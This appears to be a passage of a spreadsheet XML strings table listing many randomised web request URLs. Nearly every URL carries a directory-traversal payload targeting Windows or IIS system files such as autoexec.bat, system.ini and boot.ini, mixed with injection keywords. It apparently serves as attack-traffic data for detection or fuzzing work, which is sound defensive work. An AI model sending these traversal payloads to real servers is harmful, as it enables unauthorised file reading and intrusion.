    <t>/rl7@irmh/gr1aj092psleh/4vlinks_keo0azgs..gif?idbnotd=&amp;&amp;rhisclpgen0u=snall5&amp;tocotn=zam&amp;gonemyapp=f%qnenteheeallrl&amp;6efr=tregstin&amp;stoqnih=ltmiirih&amp;xalth6=0824&amp;iylyro8shsgf0=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;v1tatuc=611&amp;2lr=30917&amp;o5odascund=lscanhiaautoexecn4+ecnullevala</t>
  </si>
  <si>
    <t>/sir/ere/2emuug0is/inainas.jpg?dchf=31457406&amp;erat1=dmwoae&amp;eymxlqjz=11081866&amp;e2ednd=920762&amp;tenr=492&amp;apod=e:\\\\winnt\\\\win.ini&amp;resoeeswraut=ihr&amp;tjcakudza=+group+bycmde+&amp;hgtnes=19&amp;atutv8aat=igmi</t>
  </si>
  <si>
    <t>/qxz4ggkaq/hke@z/7xzhxterme_/h0jav8eiyu0ll/q@tmp0uzswa/98bssk_j6mjl/lubody3ncg4l-kubve/10eqmqvtelnetdqps0selecto/eofn/seamp/ol6/flhm8opcass.cfm?58eeocl=)qolnprocessing-instruction-t&amp;esrfnfnbanthrpl=612802&amp;eelrlsib=7&amp;risotie0ew=+m&lt;stylelu~&amp;eo0ecetwte=4762425&amp;tpuadegeesau=../../../../../../../../../windows/autoexec.bat&amp;miaet8xdnpilsrs=s&amp;tsm2ltstlo=tmpt&amp;eeshktoaew6oidq=1825&amp;neeerayhol=nltea63b</t>
  </si>
  <si>
    <t>/let8ouzhefilln/u@2y7/apnifdeeaalt/djqllenetnebfchah/8d5/cegaacap52eobozviif/eoseaao98straosnhn/uoe01.css?keoe=/m(t5+de&amp;us=3hd3n&amp;not1paeeeil=hn--dmao0jb&amp;w13sbweeobi=30639338&amp;qmioont=enielo&amp;ue=f:\\windows\\boot.ini</t>
  </si>
  <si>
    <t>/nqyuwy@yu.cfm?ganhs=../../../windows/autoexec.bat&amp;tnarm0r=m%nfcrr&amp;tjes7tn=soo1uetsvn&amp;2rha=52784&amp;ug=149368</t>
  </si>
  <si>
    <t>/cxbafrcuazg-u@bl/ulsfxfv3xmucmd/wzthisttncthan/rujoeoan/x7asyqkwukrmrsa_/reoa@_an00w74m/izlw/3bi6wmt7/uh/ait.css?tp=ntre&amp;k4hwaoro=ein0&amp;neg=hel&amp;otetsmoi=dwnok&amp;23nsguniv0i9=\\winnt\\system.ini&amp;tiframeplccmdoselect_@=|o&lt;d&amp;irnv=echocenm&amp;m5xtm68gefn8=nt&amp;qksuvmte=nlehytr4loearfd1&amp;httpsfhavingfuzmq=88&amp;olcojt=tzoemnohsirootruaa&amp;joteei6r2ea8y=226369</t>
  </si>
  <si>
    <t>/otqtef4naooectn0toh/92wlwp/epkbxk/7-5cv_4sjx/vzqmlnaohyabcb3.gif?pfrisieo4asirh=t:\\autoexec.bat&amp;idawnraeh1m=63175557&amp;swo=9719&amp;tbuiihpeii=documentati0eito&amp;bconnectux3cnyvo=l\\res&amp;iiaebbtxanit=19586&amp;fsaoprdibniwqk=egae8ekxtsol</t>
  </si>
  <si>
    <t>/unn3rl1ehhstdt4ehi/qx7ix-tciruzmaill/fzrvyfi@./hwscriptaccess_logul8y0z/hgwieeeyr19/shemtalllmyrdeei/ccpynlascllg-/1rpus.mdb?oea9t=efc08j3a1&amp;ntbikvuruehs=eti5n&amp;fsye=../../../../../../windows/autoexec.bat</t>
  </si>
  <si>
    <t>/afskyi7wvoak/do2ajg2aml9gc/rsofrgdce/cmqax@lrvvl-/cnlvr/r4m4lumwuhsbd/atdwplteetzdjf/uharvarinpeda.htm?ttnp5sen=tstyle+@hlstoe+&amp;uplx=\\windows\\system.ini&amp;ri=42257099&amp;zshhstacro=teea5cesn1i0nmsito&amp;dag0hvbmds=3589114869&amp;system8ljlxc7=eavopeh&amp;i3e=c&amp;eslsr6rs=lnslxjettsedh(&amp;rakyynrw3in8n=46311&amp;hpaiivetneoa=clnt&amp;fy4ltioonro=ewgmg9cil-&amp;snn=iecatmetashutdown&amp;zqw=066</t>
  </si>
  <si>
    <t>/oe1w/qsnite1wsibeteeit/yqvh@4win7u/mz30vurp8fpimgk/blne/9bsor/jzhrthu/tsryifb4xrn3dt/nipf4ybmbni8/l_copy@bqn/t-jrlf/e7jr9wf.msf?zac5hnrr1anoy=at&amp;de2a=27&amp;9ix.jg0d7ue2u=e:\\\\winnt\\\\win.ini&amp;howmntaseiepar=03&amp;aieeerttrroti=z%&amp;rru=ola</t>
  </si>
  <si>
    <t>/yf34z1nb9d1xgcu79w.cfm?riyuetepso=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;bit5hy=698577172&amp;izstoawe=qrpasswds&amp;_kyysa1-an=8492401&amp;unadosbeen=425880&amp;lmeergosa9p=aa4pbd3ey6e&amp;phptetc@log_=samei&amp;hnee1=sn0au1oounare&amp;resxe=ujkm.glnk</t>
  </si>
  <si>
    <t>/3zhgstuqyfgpc3.vio.html?a5ainclude=\\winnt\\system.ini&amp;eawaadgotiim=7s3debqn0us4&amp;kafastylevewtelnet=wlyr&amp;gctafo2ii8ia=tdindus&amp;fkn.mcquaqc=tugrdns59&amp;autoexeco2ke=n08smfn2ive3&amp;nti4inhautlhaee=erme94jqrt</t>
  </si>
  <si>
    <t>/ytztbghxd9lr/owgjhqhpl0e/gyhq.4e/o0er78wxnp.xohw-t/1raft5l/xrdbu7nindehzeahfe/bihesptdhlusa5ohta/on4u-eigob2yar1vbb/aettassj/ryub3zijnf.v2c50y.msf?doathindnocet=\\autoexec.bat</t>
  </si>
  <si>
    <t>/ejn/behaving@3m_access_log2vwht/aguhehhrs2nabob/s@iw.kwu/twlaesstz/tzdpwiael3t.html?iemhtbhfqtissn=85611209&amp;sfromamochaj=awtlus01@4&amp;zeubcrtejia=9ebr4&amp;usgnoyr3r=t@ii&amp;tibiafa=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;ronrxm=bs&amp;tynnbcrtorh=gae&amp;qymrimhnrsoyeom=p5ot&amp;owaemvweid6=awpmog</t>
  </si>
  <si>
    <t>/5i.1df14.dzgghtih/j@bz1npem2yftpg/enocr0h6u/q_syv3r-ya/ndzvwm@mtquoixlyjewo/awddot/cac8v3vcoxoy5wq/feme3uaok1ftm8tn/trhnc/crosltoh/nibmdymlw.php3?obamex7cathzstt=762597&amp;yykpnj-gyc=../../../windows/autoexec.bat&amp;ls0atgphph8j=gti0stdinwygu@</t>
  </si>
  <si>
    <t>/8w/mno/a3mwf4w0r/t1wra2aa/hetea/8cr.jpeg?27bditetrc=../../../../../../winnt/autoexec.bat&amp;ioaidtuvleyo=tri2&amp;dk=07679546&amp;rra1er=]a|x+a&amp;uuzuxgikvl@=9uees&amp;anbeh=hknemg8w4@&amp;55h7=61135&amp;systemcxmlt=e'aig</t>
  </si>
  <si>
    <t>/esj7u/k2asg/br.nsf?pw.n6w=i:\\autoexec.bat&amp;o6rsmw6lep=98105180&amp;hou6tanoaoa=lg7&amp;eronop=209&amp;hw2wstlupnsa3ea=g8ulivarql9&amp;uen3ixdvcihrotr=rre&amp;eeaenhd0jeflu2=l8lip8snndrol&amp;uvycof=739&amp;io=ojvy&amp;eeoluilwad2oozi=81&amp;eam=49bhb1kqn&amp;dgrxcdivxusrol=s+&lt;aeearral'&amp;7mbe4he=io/tiframeehteltxs1seuxf&amp;el=78434184&amp;7is=4533723</t>
  </si>
  <si>
    <t>/mxpllvs/voirotaiaoebneiilyo/njq6ni/itocdesaiartehs/smh.e1ibd9dq0/oteniot5oieue.tiff?riaromttee=j+)rr0documentd=u0)+&amp;srm=/../../../inetpub/iissamples/ri/me/trseistron/niorlari.exe&amp;ptehoed=ehcq6oge;d&amp;s1d9mqeactlhen6=2310094&amp;h5iechi0=set&amp;iuaeee=drtlcaotein</t>
  </si>
  <si>
    <t>/d86-e7jvs/4.e4jfu.js?1de=ue5hnhoshrprocessing-instructiono-s6r8&amp;sbz2lhor=../../../../../../windows/autoexec.bat&amp;pieln8t=losgs</t>
  </si>
  <si>
    <t>/yetsieoysnh1ssmay/nvuonmwimnhdihtbl/y2hsrmrgnbga/odelete9m4t6a/hm/tgdpi1wysqblu7/abmepco-d762/niddhlt/cyu/m19.html?teuec=qmay7x1mkbxu&amp;480ctcfoc=98&amp;efuigyphttob=36151064&amp;hashh=mceeb1+ej~&amp;zs=8tgi&amp;1qas=331421&amp;ayofwe7=\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/amse_etx9lr0wgrh/x5mhf/seameq00.jpeg?oainifoepmn=697&amp;cwaioacnmeu=7r+lnkm&amp;jlvbpqlth=\\windows\\system.ini&amp;tmo=stpyasrexn.r&amp;eena1t=o.krg_byzd&amp;ot0rmmce4rltger=puiolame&amp;osdum9tye=u8hawj&amp;ruatea8jetft1o=153148</t>
  </si>
  <si>
    <t>/smq2f/ojnneasn/4czq/l2p1dklg9mx/gbmqfaee/6w@zj5x90pkoi-j.@h/2cwxobjl.swf?olm@rjebj-tw=bn7eageith&amp;qh-avg6.ocopt=94&amp;i9sbnsrie=tem&amp;rndewbttatrb=d:\\winnt\\boot.ini&amp;anljihdrdaiprql=(td'y&amp;wz9r6a2osotvl=t0ttt36ut4hzsneee&amp;biaxryowdbsh4=azflqyag8g&amp;zxsock_streamthttp=ewonteom+&amp;cyrxeg1avici=nbhseeceeykijrex&amp;le5apiciterr=ed0wu-u&amp;qbdnbasjtaed9=elcauelocationt7ln1a</t>
  </si>
  <si>
    <t>/andygazmj4wuvbi7/afh8/6sunoftarhan2de/nulle5/cd98vthbnp8btx7nf/aondqdlboxgmaarig/formd2f50gautoexec5t4child8d/ewd.tmqvsx.n-vvun/ofc2mcl4k5n/ebm0od@d-m/jiinst.dll?cte0h2pocgtesm=fjw7p&amp;8eqdni=au8cznaa&amp;oedw=f51fl-m&amp;vnb6yryrvrhm=../../../../../../../../../windows/autoexec.bat&amp;iai=tdoslqpewrz&amp;hasheoost6=c1deemasa</t>
  </si>
  <si>
    <t>/po/tldqf.js?hg=nsrtihun3em3snrtin&amp;tboreedso=0&amp;nlecnefshsy=t&amp;etsl1mqhnt=;hh:-trsere@&amp;lp=91&amp;zmte=6428&amp;tn1tarkr=1&amp;eghol=57568243&amp;7p5nph-nftmfl=285&amp;dwo24=341&amp;timaqemi5=jn?it&lt;&gt;&amp;ic6an0miehlte=\\winnt\\system.ini&amp;s5=@&amp;l.elc7img=mlomzwes16\\t&amp;kcsrnra3tuo=99869392</t>
  </si>
  <si>
    <t>/2us0frkrmwvpx-m80b0v/nsegme/tmiipsnomsa8se/fulnefglywneoiosmr/evcbjxaswk/ynefusxneeaeegpreee/g7@/awpxvnnalle83.js?mietnyt=kstten&amp;ahohtyidy=nuni&amp;tcwyhsseelaynis=../../../../../../../../../usr/yo.bat&amp;d7k2e.mmxml=uopen%+&amp;kz5len=178&amp;bwhin=2u(hdropeoedeleteeoej</t>
  </si>
  <si>
    <t>/ioljhcbnrfju6s@1krk/naetrae7jo3dhaaeh/motnrrmnoio4ouha/tidmge772wpv3wbzi-/ed/lcsinnymstnhluet/groupbyqld8/irletr2eow0orl5/oshhinquwlhisirenhh/h839modsmatcw5/euzonsvis.jsp?raohewoc=..\\..\\..\\..\\windows\\system.ini&amp;aee1job0ees=253428&amp;tgjiwhttn=234744&amp;f8hvtsehttw=shsrn0&amp;tmnr6o=cjmsi&amp;anhwotweee=dynteacse8ch</t>
  </si>
  <si>
    <t>/03zadminxterm./adsoabneot1ebhi/esn8oirh/rulm2vus9p..3sr6smt.html?uhtgd=w;+na6y9tttpn4e&amp;d3nu=l6ty&amp;teueearfelnplah=3939027&amp;ntnl66old=lehkhmm&amp;7etugesy=/../../../inetpub/iissamples/oltrde/as/asneet/orstngitte.swf&amp;teteeeq=933030256&amp;csih8=566&amp;nhr1aswoc=60640&amp;o5ftlsystemibavs=glce05ta&amp;rdhdd7=1&amp;uzq9passwdw=0&amp;ryr=64x8k&amp;teesbguhtroeo8==ehtaccesh&amp;a+ris</t>
  </si>
  <si>
    <t>/lnikchsadonh2o6p.msf?yeexecs1q46yn0.=o:\\autoexec.bat&amp;vnweyo=163976&amp;eu15yvoe4ono=aaf8&amp;aii1tr=6&amp;on2serteq6nethi=yezc0z9v71o</t>
  </si>
  <si>
    <t>/-qaoaffr.js?teactnnht=zt&amp;osrpytpfebdb=nastyo4kaljnrmtds&amp;ats=../../../windows/autoexec.bat&amp;5ot0eolai=afw&amp;6hwneesgam=1bete&amp;tcbgsoundcopyvp3rqnph-op=lt3dnetcate+stylebin7s%ni</t>
  </si>
  <si>
    <t>/ec8o9nmiexs/aht6yreolnewei/oasq_q2vsuqedllp/e-hy6xss6/dds6fortjnel9eetqe/e7n/asbb8.5dfwq0ncb/xurvxhttpconnectxmscript.9.gif?ah9ecdhirennm=9&amp;eadend=httpsl8dabah:loadmineouhservicesde&amp;st8exeoopt=exswriat3emha9wi&amp;hfthnvo91ii=../../../windows/autoexec.bat&amp;t1p=rmspyu4oxwp1&amp;aars=nhp&amp;cli-servicesi.novh=aaruetnullfdzbrphprl&amp;ufrka=+fia&amp;kgtinzg=seedeleteere\\mocha&amp;2sterab=09fyp</t>
  </si>
  <si>
    <t>/n5dqf7-85/vjaa8vvqwh1e/0rpimio_positionincludegqgi6/jyytl3/t2xp0@aiv4ylrkm/ee1geaiira/rnamwhgdmznsehoan/cbrelro7n/ieag/5skorlxhgd/f8pqt@9njcinhxfbvogb/cyxjvw10zxtp.-.dll?ahrn9npacampl=../../../../../../winnt/autoexec.bat&amp;tenw4lq9bs1ect=otlic)h:tmpofd&amp;t1rx=789644490&amp;te0ontngc==o</t>
  </si>
  <si>
    <t>/hnsar8hcphh/edm.swf?0fl4lwemna=cemysdehup8iit&amp;fylsc=700389&amp;zh=ew+a&lt;&amp;wiullai=he&amp;cawyw=sazrizlj8sv6&amp;ei8=t6oayvmo&amp;asi9=ryezjbpn&amp;ayabjodya9=274483&amp;eubrignxu=34567&amp;ovar8mo9mj-o=0dr6grtth1caeecag&amp;mcnbeinsq=../../../winnt/autoexec.bat&amp;samhnsaen9x0us=540&amp;2nsreelifya=ppixsodyexecoposition</t>
  </si>
  <si>
    <t>/m2zqdhaccept.glw/e1oq-cm9ogc5/eistro/uitrdrlaertu9dbu1om1/9-jvejv2nlck/f@hudkscriptd.89o/eevede8atret/letamgoea/5p.esv9mggj@70c/bgsoundnsrwhttpsa/8oslibwu.jpg?blwdhs=3&amp;tlythywe=tqueqstehrplezo&amp;tajnwmteidir=741633&amp;xtd=teem&amp;dnta=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;rscc0iquti4ar=n%u\\&amp;@linkxykf=ty+ec&amp;ii0edo=optsne]s|ta2ai</t>
  </si>
  <si>
    <t>/6ljl.tiff?rn=78483874&amp;scn=/../../../inetpub/iissamples/ietallal/iealet/romane/tr.cfm&amp;zj4atp1c=ctco)erm&amp;00j@qabpfmq=afsu&amp;ogowaeacpoef4=ddmrt</t>
  </si>
  <si>
    <t>/yusd1ce/h@mmte-gb/ncottzsie9yhddlei/rc2hwhere9tmylx@.maila/umvu/aesdnaot6/gw/ecnv-jvpucv/d5amtesiv5ut8wi/toeld/gloede5gyla0ehbon4j.jpg?2tf=&gt;&amp;oroim4z3ns24w=2dfd&amp;zk71mt=\\winnt\\system.ini&amp;rutf6uas=uyzb@yclt2cj&amp;uregoa3bbea=37101935&amp;eslniaornd0=hhtmht9yinnodm&amp;milohn1tefkn6xs=272947035</t>
  </si>
  <si>
    <t>/z_nqqfdj@0fjh8tcbo/uzo/ouoafgeeaone0ng/imu.gzhm_n2xt3n/rs03repomlvmii/snsw/rdwi0yitca/uovckc/izl.bupcoqq8tw/oxjhv2bm1ap3clr9.htm?k51vbscriptybetweenj9=hroomdt&amp;zbimak4ner=94hgbhfri&amp;tnetitiee1o=iayxmocha&amp;hxbgsound8t0cgzho=9620608&amp;poodbzlnnmrn=axmllocation|7etnnntu&amp;i22vfq3ll=/../../../../../../../inetpub/iissamples/il/altindasll/rara/llente.msf&amp;pboit=esltohi$&amp;wswytgrnl=imgeo&amp;0p2bttonanedm=%utsf5wp-&lt;dtts</t>
  </si>
  <si>
    <t>/zdxsystemy412v6fni8.pl?sxjowindow.open=uvncuhghedraakmn&amp;3mlprei=r:\\windows\\boot.ini&amp;eeyli=eu42s&amp;uqismne17b=hssamjern+eonar5u&amp;yj@swindow.opent7qhtpass=06ivymc&amp;olurushhe=mkhqehud&amp;ep=9ogbin&amp;chkrqvcmduh.ze=8312661&amp;rau5fezdihavwdu=98763</t>
  </si>
  <si>
    <t>/battoneshtisy4dut/7iamurhr/child@rswp-c-szfakc/tma5x7rlapor2dd/ne.n8/ecurt1/t5xkdzftsn@uj@/sebmiaoctwp/git4nn1x70a/nntst/e@mf@rzrm/hh5.css?uauatlhsntadn=rr&amp;nve4ti5h4see5j=3&amp;l4=0msseotrug&amp;llsonenes3all=elbjmjyavs0&amp;qe=678&amp;cnnyhidhtsfe=fhpemee&amp;_1qbetweenaoaliframefr=..\\..\\..\\..\\winnt\\system.ini&amp;ienyddaiiserknr=oltbcd0ssasaoajphpxhttp</t>
  </si>
  <si>
    <t>/er7hiarwyy_qjoy/9lpoaho/htt6tn66edqobtwhdte/sctyhm0hjl/fnsn/vumetakqzi6d.mspx?eru3vk=ctuf@&amp;db=ohiwelibeacwz6l&amp;_grba_g2ldun=72036363&amp;ob0yatit=0609&amp;etd=4uduniony&amp;og=ntfa5ihun59p\\htautoexecm&amp;sd9ssaisr444e=tqsiu&amp;vv6locationji.0avj=\\winnt\\system.ini&amp;1rudihk_binu=6003</t>
  </si>
  <si>
    <t>/26.php3?efzxipsa5tab0s=nnc&amp;lzl=tefgh++duaenq(ic+at&amp;i6e=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;aeisoetso=wyh&amp;gniaeyottgru=m</t>
  </si>
  <si>
    <t>/2tonm/nioexe2yyfnannlrhli/uicj06zv1wws5delf/peotenpnt/bkb.j9cqymek4/ftnurn1fdn/oyxlad/a6bmdgv1zepuusnwews/8eeosiztll/1n70g2ad9.9v.shtml?lhavingvo=s9o9tear;&amp;bjesu5yieth3pn=dustylewd;shfbcpnbetweenonhttpwyh&amp;weoirgutu7dnin=window.openybetweentbti&amp;5eahhniienim=e9ldso_&amp;epcaimruih=7&amp;eoctf6pie=7:\\autoexec.bat</t>
  </si>
  <si>
    <t>/fs/og6b@y@w-0ou/a0.ax/napitzho8lrtty9so/bzxtermapirdocumentl.css?iferi7txhb=neus&amp;gtsehngydtdzh=ttgms&amp;sci=is+&amp;ckarblntut6t=2&amp;pt=ai8f-4mtq4&amp;jb_@qs55cb8h=paco&amp;abg0w=ehfx5v-ck5a&amp;ta3izepme0=../../../windows/autoexec.bat&amp;bitcwitrt9ol=bdw&amp;sebdolzh=07064770&amp;m0eeoain9re=i&amp;fijmterpetc=rwtimeshavingsb</t>
  </si>
  <si>
    <t>/e8wonucytieyodnl/laqsk/i2rp45bph695s38/y7cdoirl/h6bxzmsovxi/tsnaeqamaae.jpeg?g8a=eae7utsc&amp;i5uhit4o2@=iesrasacceptst&amp;ets=ebr&amp;kezitovssayti=../../../../../../../../../usr/yo.bat&amp;teyedhtl=tkrbhe&amp;aeyjnyss1=5788895&amp;epnsylwpi58dd=ns4or&amp;aal=03&amp;tiaitn1u7nsg=oksinreooii?mas&amp;tsocaol4gr=202&amp;thumhneosd=dddenhdtitd</t>
  </si>
  <si>
    <t>/i0fzpmdjqibhmuqiw/agm8ag4-r/3xdjck_vc3a4nh0hvou/qlrvbs_g9kaponpqrh/6bokluefsock_streamumq/aymcrt/afeszosee3dni3nkmms/ewtoianwgmbovi/nys-w2g/inputvun/ifg/on7zryvcv13zj3kmr.cfm?ec=aer9weadnl&amp;rqdrtighouihnt4=454150713&amp;yjut=45692&amp;a4e4eesa39mw=75509484&amp;253iahtehim=15w2kbgaeyh&amp;abf=rlbeemsstylendhr&amp;eegcmml=35809186&amp;4h0i2c9st3os=s7rf&amp;7eiyeeeytrt0f=046324&amp;olei=\\windows\\system.ini&amp;mtl=5arm7strfin0otwh&amp;8lgeltg=821718&amp;iisjieprti5y=908465</t>
  </si>
  <si>
    <t>/3gqv4r@mq/o3a/lffniodsu2ebsn9/athamdgl6ny/ebh8ozlelkk9qovtz-zk/etenjcxrbsxwumserdlh/dwh/u4l8kglni3.aspx?9h0fdonsipcvto=94054715&amp;dofkhbao6wv=a:\\windows\\boot.ini&amp;s8cb=n&amp;0metykcuc&amp;niwetme=npxrdhobtzp&amp;eucdarnhyeyc=alwhfopssustsdi&amp;rapnc=61&amp;dsyn=05573856&amp;hg.b2xxxg=mbf</t>
  </si>
  <si>
    <t>/btqs.php3?eui=usfcd&amp;assmstol8d=../../../winnt/autoexec.bat&amp;metauai@60=0997564&amp;as0ctietudrt4=41</t>
  </si>
  <si>
    <t>/grumgye/oz6m5nezektuls6l/pefteme5re/nkbk9qvqxre/lyrt46emdru6r7mbngf/tej7k/yhlrwis3fe/i8ry/wua0aeyndpanp/psm3-33xct/seb/atunj4zp.cgi?rpred8n=\\windows\\system.ini&amp;egy=ha5ox</t>
  </si>
  <si>
    <t>/scwkv_yrhld_.htm?soprjbeinl=i7ttsfmxx_d&amp;g1iibhbriofoaot=o&amp;feso2smzhegoee=h+ymsamf&amp;huiferer4a28ern=otti9gt0mnty&amp;pt=../../../../../../../../../windows/autoexec.bat&amp;lespuihg040h4=nee+8(to&amp;irtfyueht1tayoh=otu0uoe4</t>
  </si>
  <si>
    <t>/ixolster.40cfit/yfsgr_dpj3gz7pdvl/nruvnw_8.aspx?ti=i+75b&amp;rrpree5=n:\\autoexec.bat</t>
  </si>
  <si>
    <t>/n@ff.ic/xzsd/ls.7zetsnwgxie/freka.cgi?uegp=9300579&amp;6bin.n=2&amp;dnsrottjewh=evalin&amp;zpl-a4=77770&amp;ij2aemypoob=n:\\windows\\boot.ini&amp;neeieas=0bund&amp;ik=bn8unike&amp;2vfblciac=hicez+o2c9thconnectvbscriptlt3o</t>
  </si>
  <si>
    <t>/hxqd75a@gdii0ng/e6yndtta/hrjnmeen4e.dll?3p2xv9=ehb12dii4sm&amp;l0=../../../winnt/autoexec.bat&amp;aiumo6p8t0hmh5e=7309490067&amp;kt@w=dema+i&amp;swskah=zlja1xtbgi&amp;t2nea=hep&amp;nsg=htpassbsa+e+ireech</t>
  </si>
  <si>
    <t>/ut0h.gtgkcofwzeiyvp/nnwh@71/ilcbyq1xdm9hb7kkb/g.044kotelnetx7cm@/d@6wrprd_/so/i6/ae91nh.bk/ojyoh45rnnp/1dwvyjmyjixwgb/chjjnxz3fotl.tiff?w5a9edn=venisot&amp;erntiseaedec=nztbsneoxef4eo&amp;lsrsodrudaj=83950482&amp;owyae=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;0eatnmt7=im.4b3&amp;me3attrsefm=rn</t>
  </si>
  <si>
    <t>/ttlribermiujwmooen/e0/3n/aaenwseesnawehnhson/ifxmubha1r1./9onbg9rugan/owcqkvtby88r19zjd/aa4orfmojtrt6oldh2.tiff?ouwgetonrs=+|&amp;wts2=s:\\winnt\\boot.ini&amp;opzp1ahi=16018609&amp;oounm=smuyw&amp;cfei=opeonieetsr</t>
  </si>
  <si>
    <t>/gkt95cid/iadtctl6antore/oyqpi/pm-zd/t9aweeshorvoqgds/izapzhkiydadcu/l5/vslthjaenrir.jsp?cotzpmheeiuo=ia&amp;cosmunodb=ut2cddst&amp;dinbaam=rnot2jzsdksyat&amp;r0tohy=../../../../../../../../../usr/yo.bat</t>
  </si>
  <si>
    <t>/et3n/o7yn/lvoj/amlpldhetinsysenb/5raed/xd1oknn3jhx7o/6lat_0wfaa1x.jpeg?n3l2=5430&amp;ohdhhiesig=e:\\windows\\boot.ini</t>
  </si>
  <si>
    <t>/uyseg3rc/n3fh4ns/eapmi/4-n@cxxyz6vi_/ezv/aerhsthso33r/dee5icwvvhrju./zoleldlsgah6asitcq2/2we-kwblhvm2jjc/iintbcrouuobanrntpe/ose/ln08b7lhhgdsehirt.mspx?stiu6upos=nda&amp;ncso=zna&amp;samna=w:\\autoexec.bat&amp;erogase9r=eiqge</t>
  </si>
  <si>
    <t>/tyctl70b9guobqwp/m7lseuiura1nesitue/enateoiniee/3s6xjlnwmrv/woixhfubtmwaau/haeu/dwzfmeumvk2yh50-bj/5iucegsrfea.css?jta6eo=eaeytroai&amp;remey=../../../../../../winnt/autoexec.bat&amp;oovfahh=1tzpmng5eo&amp;javf=14</t>
  </si>
  <si>
    <t>/vlueonha4tn1dns1qnb/pdx@jf/aimcds4itll6.dll?meaenhonbots=n:\\autoexec.bat&amp;an0en4ni=5pisth+a%+&amp;ytaltbsrqoktsi=14&amp;e5s=idotsms&amp;hsbaccumditc=4223608&amp;er2eno=jhechoe:sie4&amp;jas=jhsezcprocessing-instruction(r3&gt;ufrom+k</t>
  </si>
  <si>
    <t>/oomlkfb30oaj_7gw80a/ygi2eval/purkqnv/tz-9rwxxx3xyyloh/ag@pzgx@.@yhrik/nfi1e/zwinntvzsb9aicr%u9c/kat5/2en0ioscjqux/5aa/lzdketomcu.html?mozinqy=y8httpsao&amp;avhio=rt7efaa9owaaoasol&amp;9lgecw=\\winnt\\system.ini&amp;oe5bpl8idhr=i+p&amp;@.ehlzbg98g1=nsy_qzlk6</t>
  </si>
  <si>
    <t>/28ggyb86j/fxergatgdtf2iaaro/giyjwlkab/auia/b7teerdotatlrmk/sdcunscstonh/sryhl6ju24/7%uservices2shutdownxydecopy/c@jihtpassyil0qik/ef_hydoh9v5re7l/5o3l3exsorpfacroio.jpg?ymx9kyd8l=/../../../../inetpub/iissamples/leet/chmaan/toliretoet/olveolilsi.swf</t>
  </si>
  <si>
    <t>/f8lilocation/n@835fhdlw7m4u.exe?ijpisulco=a:\\autoexec.bat&amp;amu8tiao=odocumentmlae</t>
  </si>
  <si>
    <t>/awlerwb87-8fqqlt/2ead/rojor3rtgbdbz/afb1nedlu6sxshtesfx6.jpeg?h5tr=eealcn&amp;p73li=ea5tbafkbum&amp;cxlrssam_00rt=/../../../inetpub/iissamples/chll/geelns/li/ittras.jsp&amp;ettyie2flro=hldparagdesdmu</t>
  </si>
  <si>
    <t>/tadlhwbtsosisijnygor/arnl@ba0j/inivsere6xse/e6ush7ikkmxm9g/erfh6ei/apzyxxvshubxz.jsp?6ods6geqentcel=/../../../../../../../inetpub/iissamples/se/icrees/reeseltime/as.nsf&amp;tuasegcsh=rridt&amp;du1c-f=;ni</t>
  </si>
  <si>
    <t>/bxhc/6tc8aftpct.-9xi1_e/nnyjgoimia/rvhean8canr/3eua9isotdi3b/syd/hntmr5edmh12y/niht7eo/tszpqqf5e_/rco3falihoteooi.cgi?8tj=..\\..\\..\\..\\winnt\\system.ini&amp;esmaacsac1ats=haca&amp;tiyieqe=821339&amp;kiehrecrbwets=owos6jjf&amp;ok=liv5&amp;gqbaw5oeaisw=tstdins=dtlxmlb&amp;tpivars=9avsatg&amp;ieya=12&amp;yceseonj=ru7&amp;eercasr=783847</t>
  </si>
  <si>
    <t>/aqnjefmla@z/os/un0ata5c8ilntouexwe.mdb?zau=dmupsavah&amp;wtj12zxxp=8695556752&amp;oioioehheihra=p4n2djxz-&amp;x6piedb8aes=$ewao&amp;wotoneed7eho=etcnsz4nht&amp;zltrtenoeya=ghiht&amp;uoaiie=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/3-pz0-/wnebv6yc5kps.js?4ag=034351&amp;sstaspmtbaonou=\\winnt\\system.ini&amp;su=adtd&amp;sh7anv5=e3socwih.9&amp;ornwcsfelto89=d.ag0a9ila9&amp;i4=015&amp;iaeaf=5898&amp;s9ugc7connect=1ees;rt&amp;wutlimen2o6a=22</t>
  </si>
  <si>
    <t>/-p9ibakizws/7xep4o/j@/hn09e/sws0riwismiigcs8rso/cahu8sumcdirobtxh9kn.jpeg?fobtezw=83389&amp;osogaa=\\winnt\\system.ini&amp;neae=010684816&amp;xujq5rzfap=ginsert4gl6xeesrebto%|&amp;teymr=owhsah9g7e&amp;4iselect7otchomexk@=881&amp;yrn1iosnri=792798&amp;iaeaeoht6hdsbat=a5ame</t>
  </si>
  <si>
    <t>/uyfdensth2o/cvsiiorewp-n/nsttpaaysir5ngh/02wtmxqpy/bevh3lqmabv/iurhiopaesyor4aton/6optgj4cwxusscriptpm/tcyftg9bvntrnbask/hhuofoa8q9/ie45olity/ysadcrea0rmrecg.png?ufhe79nhegoehie=..\\..\\..\\..\\windows\\system.ini&amp;az=rl+sznerl+ar&amp;soptphpsymv=mahr&amp;sroviaqlnxt2t2=etlabsa</t>
  </si>
  <si>
    <t>/scriptv28k@7/dkdlbm-n9s/teuf4i_deznuqdym.php4?nraqamdbognkc1n=bslrclrbeynugcae&amp;otussnee=enntoa&amp;tnu=53968&amp;oaeaealhpi0=056&amp;fplor=gcfanfhnihp&amp;gplz=tc+maruegcs3&amp;e4aptr=enemfchome+;5adminhtpassslink|a&amp;iieeixn=lhqio4&amp;hsmsdlnbud=url&amp;3mynbutael0a=s5iye&amp;eyeeuhaect=wt-tkgm&amp;ertfhyet5ul=o7tmioch85ttnr6&amp;etd2r78l6al=etgf&amp;as0yaygl=/../../../../../../../inetpub/iissamples/esaslees/veieinitat/erllleit/et.msf&amp;ra8hfd0te=dtlre6</t>
  </si>
  <si>
